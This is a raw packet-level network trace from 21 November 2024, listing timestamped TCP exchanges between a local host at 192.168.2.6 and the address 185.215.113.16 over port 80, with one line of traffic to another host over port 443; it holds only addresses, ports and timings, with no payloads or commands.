                                                                                                                                                                      Nov 21, 2024 06:23:39.818351984 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.818800926 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.818856001 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.819430113 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.819812059 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.820521116 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.820578098 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.820666075 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.820713043 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.821597099 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.821732998 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.821861029 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.822685003 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.823236942 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.823777914 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.823838949 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.823988914 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.824033976 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.824850082 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.825974941 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.825987101 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.825998068 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.826035976 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.826078892 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.827025890 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.827624083 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.827681065 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.828116894 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.828227043 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.829186916 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.829237938 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.829852104 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.830293894 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.830343962 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.830538988 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.830579996 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.831362963 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.831787109 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.832454920 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.832501888 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.833448887 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.833491087 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.833622932 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.833636999 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.833682060 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.834623098 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.834743023 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.834789991 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.835715055 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.836222887 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.836772919 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.836828947 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.837094069 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.837136984 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.837858915 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.838349104 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.838399887 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.838947058 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.839358091 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.840128899 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.840141058 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.840182066 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.841161966 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.841480017 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.841850996 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.842329025 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.842340946 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.842372894 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.843274117 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.843878031 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.844371080 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.844393015 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.844456911 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.844496965 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.845488071 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.845500946 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.845541000 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.846535921 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.846781969 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.846827030 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.847609043 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.848180056 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.848717928 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.848778963 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.848866940 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.848917007 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.849807978 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.849819899 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.849863052 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.850872040 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.851669073 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.851948977 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.852004051 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.852175951 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.852219105 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.853101015 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.853112936 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.853154898 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.854135990 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.854491949 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.854547977 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.855202913 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.855937958 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.856286049 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.856342077 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.856482983 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.856520891 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.857383013 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.857513905 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.857855082 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.858525991 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.858539104 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.858592033 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.859554052 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.859822035 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.860632896 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.860692978 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.861016035 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.861059904 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.861690044 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.862250090 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.862814903 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.862827063 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.862864017 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.863918066 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.864084959 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.864193916 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.864954948 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.865082026 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.865133047 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.866056919 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.867130995 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.867171049 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.867180109 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.867182970 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.867227077 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.868160963 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.917424917 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.925627947 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.926038027 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.926172018 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.926184893 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.926232100 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.926281929 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.927298069 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.927723885 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.927778959 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.928311110 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.928875923 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.929383993 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.929431915 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.930337906 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.930537939 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.930551052 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.930593967 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.931549072 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.931567907 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.931626081 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.949424982 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.949575901 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.949660063 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.949908018 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.950016975 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.950068951 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.951030970 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.951076031 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.952166080 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.952217102 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.952323914 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.952369928 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.953191042 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.953397036 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.953857899 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.954255104 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.954571009 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.955349922 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.955425024 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.955560923 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.955601931 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.956433058 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.956541061 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.957518101 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.957561970 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.957720041 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.957766056 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.958678007 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.959132910 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.959177971 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.959676027 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.959882021 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.960767031 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.960814953 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.960836887 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.960879087 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.961833000 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.962327003 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.962376118 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.962924957 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.963224888 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.964047909 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.964093924 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.964168072 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.964212894 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.965090036 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.966136932 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.966233969 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.966244936 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.966279984 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.966322899 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.967288971 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.967525005 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.967578888 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.968338013 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.968821049 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.969464064 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.969516993 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.970074892 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.970118046 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.970532894 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.970673084 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.971602917 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.971661091 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.971749067 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.971791029 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.972681046 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.973248959 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.973301888 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.973761082 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.973819017 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.974852085 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.974906921 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.975307941 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.975354910 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.975975037 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.976241112 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.976294994 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.977056980 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.977251053 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.978117943 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.978164911 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.978363037 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.978406906 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.979175091 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.979636908 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.979928017 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.980268002 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.980453968 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.981359005 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.981410027 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.981589079 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.981635094 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.982446909 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.983120918 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.983549118 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.983617067 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.983973980 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.984018087 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.984611034 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.984796047 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.984842062 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.985707045 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.985981941 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.986773014 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.986819983 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.987209082 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.987251997 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.987870932 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.988333941 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.988940954 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.988986969 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.989722967 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.989769936 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.990051985 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.990209103 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.990252018 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.991133928 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.991271019 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.992172956 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.992221117 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.992253065 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.992295980 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.993313074 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.993498087 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.993544102 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.993932962 CET4434976913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.994385004 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.994518042 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.994570017 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.995454073 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.996036053 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.996535063 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.996582985 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.996670008 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.996711969 CET4976280192.168.2.6185.215.113.16
